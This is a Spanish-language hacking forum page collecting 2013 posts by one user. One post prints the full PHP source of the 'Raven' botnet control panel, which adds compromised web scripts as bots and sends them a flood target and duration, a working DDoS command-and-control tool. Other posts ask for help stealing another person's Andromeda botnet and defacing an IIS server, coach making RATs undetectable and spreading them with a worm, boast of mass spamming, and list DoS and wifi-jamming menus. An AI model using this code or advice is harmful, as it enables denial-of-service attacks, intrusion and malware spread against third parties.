Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - PW[N]ED

#1
peeerdona pero no entendi nada :S , subi el csrf en .php , a mi web , y tengo un cpanel de un botnet andromeda que no es mio , es de otro loco que no se qien es , pero mi idea era robar esa andromeda bot , pero no se cmo tendrias skype , facebook o algo? gracias :)
#2
Bugs y Exploits / Re:Tutorial Sqli Manual By Okol
Julio 22, 2013, 10:43:54 AM
quuuuuuuueeeeeeee buen tuto :D
#3
Dudas y pedidos generales / Botnet Raven error!
Julio 01, 2013, 02:23:52 PM
Miren este lindo error que encontre en la botnet raven de undercode ;

Código: php
Notice: Undefined index: target in /opt/lampp/htdocs/Raven/admin.php on line 10

Notice: Undefined index: time in /opt/lampp/htdocs/Raven/admin.php on line 11

Notice: Undefined index: bot in /opt/lampp/htdocs/Raven/admin.php on line 12


y las lineas son estas

Código: php
    $obj=$_POST['target'];
    $tiempo=$_POST['time'];
    $bot=htmlentities($_POST['bot'], ENT_QUOTES);



el codigo entero es este


Código: php
<? 
session_start();

if ($_SESSION['estado']!="log") {
    echo '<META HTTP-EQUIV="Refresh" CONTENT="0; URL=index.php">';
}
else {

//insert bot
    $obj=$_POST['target'];
    $tiempo=$_POST['time'];
    $bot=htmlentities($_POST['bot'], ENT_QUOTES);
   


    include('config.php');
    $exts=explode(".", $bot);
    $exts2=end($exts);
    if(isset($_POST['add'])) {
        //control ext
        if(!filter_var($bot, FILTER_VALIDATE_URL)){
            echo "<script>alert('Ingrese una url valida!'); </script>";
        }
       
        elseif($exts2!="php"){
            echo "<script>alert('No se encontro un script valido en la url!'); </script>";
       }
    //
        else{
            $bot2=str_ireplace("http://", "", $bot);
            $bot3=explode("/", $bot2);
            $corta=explode("/", $bot2);
            unset($corta[0]);
            $path=implode("/", $corta);
            $ip=gethostbyname($bot3[0]);
            $flag=file_get_contents("http://geoip.wtanaka.com/cc/".$ip);
            $insert="INSERT INTO bots (ip, host, path, location) VALUES('$ip', '$bot3[0]', '$path', '$flag');";
            $cons=mysqli_query($conexion, $insert);
}
    }
//attack
//coneccion bot
//cabeceras http
    $encod="target=".$obj."&time=".$tiempo."&start=Attack%21";
    $long=strlen($encod);
    if(isset($_POST['start'])) {
        $consulta="SELECT host,path FROM bots;";
        $consulta2=mysqli_query($conexion, $consulta);
        while($data=mysqli_fetch_array($consulta2, MYSQLI_ASSOC)){
            $socket=fsockopen($data['host'], 80);
            fputs($socket, "POST /".$data['path']." HTTP/1.0\r\n");
            fputs($socket, "Host: ".$data['host']."\r\n");
            fputs($socket, "Content-Type: application/x-www-form-urlencoded\r\n");
            fputs($socket, "Content-Length:". $long."\r\n\r\n");
            fputs($socket, $encod);
            fclose($socket);
     
}
}
//bots count
    $num="SELECT * FROM bots;";
    $num1=mysqli_query($conexion, $num);

      echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//ES" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">

   
    <head>
       <meta charset="UTF-8">
       <meta name="author" content="[Q]3rV[0]" />
       <meta name="language" content="spanish" /> 
       <meta http-equiv="Content-Type" content="text/html" />
       <title>PW[N]ED Botnet v1.0 | ForoMalware</title>
       
       <link rel="icon" href="img/favicon.ico" type="image/x-icon" />       
       
       <link type="text/css" rel="stylesheet" href="css/raven.css" />
       
       <script type="text/javascript" src="js/jquery-1.3.2.min.js"></script>
       <script type="text/javascript" src="js/jquery.easing.1.2.js"></script>
       <script type="text/javascript" src="js/jquery.prettyPhoto.js"></script>
       <script type="text/javascript" src="js/cufon-yui.js"></script>
       <script type="text/javascript" src="js/Sansation_700.font.js"></script> 
       <script type="text/javascript" src="js/Sansation_400.font.js"></script>     
       <script type="text/javascript" src="js/Sansation_300.font.js"></script>   
       <script type="text/javascript" src="js/common.js"></script>
       <script type="text/javascript" src="js/raven.js"></script>'; ?>
       
   
        <script type="text/javascript" src="lib/DD_belatedPNG_0.0.8a-min.js"></script>
        <script>
          DD_belatedPNG.fix(".ie6PNGfix , .commonLink");
         
          /* string argument can be any CSS selector */
          /* .ie6PNGfix example is unnecessary */
          /* change it to what suits you! */
        </script>
   

               
    <?php echo '</head>
   
    <body>
     
      <div id="headerContainer">
        <a name="pageTopAnchor"></a>
        <a href="index.php" id="logo" class="ie6PNGfix"></a>
        <div id="titleWrapper">                             
          <a href="index.php" id="title">ForoMalware - PW[N]ED BotNet</a>
          <p class="titleSlogan">PW[N]ED BotNet - Powered by PW[N]ED</p>
        </div>
               
        </div>

        <div id="bodyContainer2">   
          <div id="navigationContainer">           
            <ul class="rootnav">
                <li><a href="logout.php">logout</a></li>
            </ul>
          </div>
             
          <div id="servicesContentContainer">           
            <div id="servicesContainer">
            <div id="servicesBigInfo">
            <br />
              <form action="#" method="POST">
                <center>
                  <h3 id="servicesProductsHeader">Add Bot <img src=img/add.png height=40 weight=40></h3><br />       
                  Raven URL: <input class="url" name="bot" value="" type="text" />
                  <br /><br />
                  <input type="submit" class="btn" name="add" value="Add Bot">
                  <br />
                </center>
              </form>
                <center>
              <a href=bots.php target="blank">Bots: '.mysqli_num_rows($num1).'</a>
               
              <hr><br />

              <div class="item"></div>

              <h3 id="servicesProductsHeader">Attack <img src=img/attack.png height=40 weight=40></h3><br />
             
              <form action="#" method="POST">
                Target URL/IP: <input class="url" name="target" value="" /> Time: <input class="url2" name="time" value="" />
                <br /><br />
                <input type="submit" class="btn" name="start" value="Attack!">
              </form>
              </center>
               
                                                                 
            </div>                                                                                                                     
          </div>                         
        </div>
        <div class="clearBoth"></div>                     
      </div>
      <br />
    </body>
</html>';
}
?>
#4
No tienes alguno? xD
#5
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
que pongo en Insert Wordpress DB Preffix

Es el prefijo de tabla, generalmente es wp_ por eso viene por default, en unos días libero la versión 1.5 con nueva estructura y adaptado para todos los casos.


pero de donde saco el prefijo , cada ves que lo intento hacer me dice que no es el prefijo :S , donde saco el prefijo
#6
que pongo en Insert Wordpress DB Preffix
#7
Dudas y pedidos generales / Re:Ayuda...
Junio 03, 2013, 07:45:07 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Aca se tratan temas sobre etical hacking, no de defacement... lo unico q te puedo decir es q no te limites a exploit y q hagas un pentest respetando todos los pasos, en especial la recopilacion de informacion, para poder trazar una estrategia bien armada, y no atacar a lo tonto


que me recomiendas :S , quiero hacerlo , es urgente
#8
Dudas y pedidos generales / Ayuda...
Junio 03, 2013, 06:44:22 PM
una pregunta , miren , quiero realizar un defacement a un IIS 7.0 , pero no encuentro ni exploit , ni formas , no encontre vulnerabilidades ni nada por el estilo , las que encontre las probe y no funcionaron alguien que me tire una manito de onda?
#9
Infectalo por lan spread y molestalo jajajaja  8) , lo hice en lo de mi viejo
#10
Dudas y pedidos generales / Re:Consulta: TROYANOS
Mayo 18, 2013, 04:40:09 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola, estuve probando recientemente Cybergate y ahora descargué el Xtreme RAT. Cuál recomiendan ? Algún crypter que me faciliten para el Xtreme RAT actualizado ? Agradecería mucho la pass de alguno ya que mi conocimiento no es tanto como para aportar algo de interés a la comunidad, serían cosas inútiles a comparación suya. GRACIAS!!!

te lo digo como compañero de foro , si quieres comenzar a poner en practica el arte del malware , primero nesesitas conocimiento en lo que haces ,que quiere decir? , que tienes que saber cryptearlo , hacerlo FUD [Indetectable] , como se conectan , abrir los puertos , aprender a hacer spread [PROPAGACION] , de echo tienes que aprender un diccionario por decirlo asi , deves de aprender bastante jajaj , si fuese tan facil tendria 50000 bots , y de echo no , cada 12 horas deves actualizar el Stub para hacerlo indetectable 100% , respecto a cual te recomiendo , te recomiendo como -RAT- , Spy-Net 2.6 , Darkcomet , y para hacer una buena propagacion te recomiendo usar un worm como el mio , propagar ese y luego hacer una shell execute para descargar tu exe del darkcomet o lo que utilizes suerte.
#11
Hacking / Counter Attack Scaning Tools Version 2
Mayo 18, 2013, 03:47:38 PM



Tools,CAST or Counter Attack Scaning Tools,more fiture for Information Gathering, Exploitations , Honeypots,Stresstesting,and Network Forensics.



Counter Attack And Scanning Tools (CAST.V2) Coded by xsan-lahci
Copyright © 2013 xsan-lahci aka Vaisal Dot Zip | Fuck For PLAGIARISM
DISCLAIMER: modifications, changes, or alterations to this sourcecode is acceptable, however,
any public releases utilizing this code must be approved by writen this tool (xsan-lahci)
Report Bugs >> xsanlahci[at]gmail.com | xsan[at]idblackhat.org | xsan_lahci[at]indonesianbacktrack.or.id
Tested On Backtrack 4R2, Backtrack 5R3 , Kali-Linux

Services:
Código:

Código: php
 -------------
      |  CAST.V2  |
      -------------
            |
            |
--------------------------
| Information Gathering  |-------------- 1) Scan Live Host
--------------------------         |---- 2) Port Scaner
            |                      |---- 3) Network Trafic with Kismet
            |                      |---- 4) Network Monitoring with Netdiscover
            |                      I---- 5) Detect Netcut!
-----------------------
| Exploitation Tools  |---------------- 6) Blocked Access Point
-----------------------           I---- 7) Netcut With Tcpkill
            |
            |
      --------------
      | Honeypots  |-------------------- 8) Install Honeypot
      --------------               I---- 9) Create Fake Access Point
            |
            |
    -------------------
    | Stress Testing  |----------------- 10) DOS Attack With Hping3
    -------------------            |---- 11) UDP Flood with Udp.pl
            |                      |---- 12) Dos Attack With Slowloris
            |                      |---- 13) Flood Access Point
            |                      |---- 14) WifiJammer
            |                      I---- 15) Kick All Client From wifi
   ----------------------
   | Network Forensics  |--------------- 16) Network Forensic With Wireshark
   ----------------------          I---- 17) Image Captures With driftnet
            |
       -----------
       | Service |---------------------- 18) Credits And About
       -----------
            |
       -----------
       |   EXIT  |
       -----------





No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#12
Dudas y pedidos generales / Re:Correo Electronico
Mayo 16, 2013, 09:56:29 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Que diferencias hay? Aparte de que saldria tu IP en vez de la de Hotmail.

Sa1uDoS


no siempre , mi server smtp no almacena ips , lo pongo al msn qe se me da la gana y tiro 10000 mensajes a 10000 destinatarios a la ves... codeado en perl.
#13
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


FUNCIONANDO AL 100%
#14
Perl / Re:Creando paquetes UDP
Mayo 13, 2013, 09:09:15 PM
Buen aporte hermano... :)